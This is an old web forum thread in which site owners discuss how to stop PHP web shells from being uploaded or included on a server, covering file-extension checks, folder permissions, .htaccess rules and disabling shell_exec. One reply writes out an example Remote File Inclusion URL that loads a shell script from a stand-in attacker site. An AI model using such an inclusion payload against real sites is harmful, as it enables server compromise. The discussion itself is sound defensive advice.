1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

phpshell, how to prevent?

Discussion in 'Security' started by toby, Jun 22, 2007.

0
  1. #1
    I have an upload file and it has been hacked by php shell before. So i was wondering how i can prevent it from happending?

    My folder is cmod using 777 because by using other numbers, I could not make the images viewable at all.

    cheers,
    toby
     
    toby, Jun 22, 2007 IP
  2. Zinho

    Zinho Peon

    Messages:
    284
    Likes Received:
    7
    Best Answers:
    0
    Trophy Points:
    0
    #2
    Hi
    you should only make uploads available to trusted file extensions. you should also use some php library to ensure that the jpg and gif or any other file is a valid image and not some hidden script
     
    Zinho, Jun 22, 2007 IP
  3. syedwasi87

    syedwasi87 Active Member

    Messages:
    2,147
    Likes Received:
    59
    Best Answers:
    0
    Trophy Points:
    90
    #3
    u can chmod to other numbers..i dont remember the xact one..and still be able to view files..

    777 for a public folder would mean all write access to all..i think its very insecure to be..
     
    syedwasi87, Jun 22, 2007 IP
  4. toby

    toby Notable Member

    Messages:
    6,923
    Likes Received:
    269
    Best Answers:
    0
    Trophy Points:
    285
    #4
    thanks alot guys,

    In fact, the php that is uploaded is with extention .gif or pngh so I really have no clue how to disable the phpshell from upload.

    syedwasi, I've tried other number but it doesn't work. It will make the images can't be viewed. It works if the cmod is 777 . What other numbers that can be done?

    And what actually the group? i.e. first 7 is owner, second 7 is group, third 7 is public. So what are owner and group anywayS?
     
    toby, Jun 22, 2007 IP
  5. clickbuild

    clickbuild Member

    Messages:
    89
    Likes Received:
    4
    Best Answers:
    0
    Trophy Points:
    48
    #5
    Easiest fix would be to check the uploaded file for the opening PHP tag, if it's there, delete the file.
     
    clickbuild, Jun 26, 2007 IP
  6. freeprotect

    freeprotect Peon

    Messages:
    56
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #6
    Anti phpShell is not easy.
    If you use shared hosting, Zend encode important files. Dedidcated server maybe needn't encode
    However you must check upload shell or include shell.
    There lot of type use phpShell
    - Upload phpShell into a hosting same server and local attack
    - Remote File Inclusion, like: httX://yourSite/bad_code_file.php?action=_httX://attackerSite/phpShell.txt?
    - Upload a image file type (.JPG, GIF...) as avatar but this file content is phpShell and include it.

    You must know what is type attacker use to fix it. Maybe use .htaccess deny excute .phpX file to protect folder, it allow your images. Any problem or need help, contact me.
     
    freeprotect, Jun 26, 2007 IP
  7. InFloW

    InFloW Peon

    Messages:
    1,488
    Likes Received:
    39
    Best Answers:
    0
    Trophy Points:
    0
    #7
    Well something else to add here if you do not want to go the .htaccess route to stop .php files from being executed. If you're running on your own server you could disable dangerous functions like shell_exec.

    But both these solutions is just ignoring the root of the problem which is an insecure script which is either allowing bad file extensions or allowing remote includes.
     
    InFloW, Jun 27, 2007 IP